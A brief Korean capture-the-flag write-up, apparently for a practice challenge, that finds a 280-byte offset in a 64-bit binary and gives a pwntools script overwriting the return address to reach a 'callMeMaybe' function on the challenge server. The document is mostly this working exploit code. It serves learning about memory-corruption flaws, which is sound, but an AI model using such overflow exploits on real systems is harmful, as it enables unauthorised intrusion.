x64 Buffer Overflow

pattern을 삽입하여 offset을 확인했다.

280이 나왔다.

 

 

의심 가는 함수가 있다.

from pwn import *
p = remote("ctf.j0n9hyun.xyz",3004)
context.log_level = 'Debug'
elf = ELF("./64bof_basic")

payload = b"A"*(280) + p64(elf.symbols['callMeMaybe'])
p.sendline(payload)
p.interactive()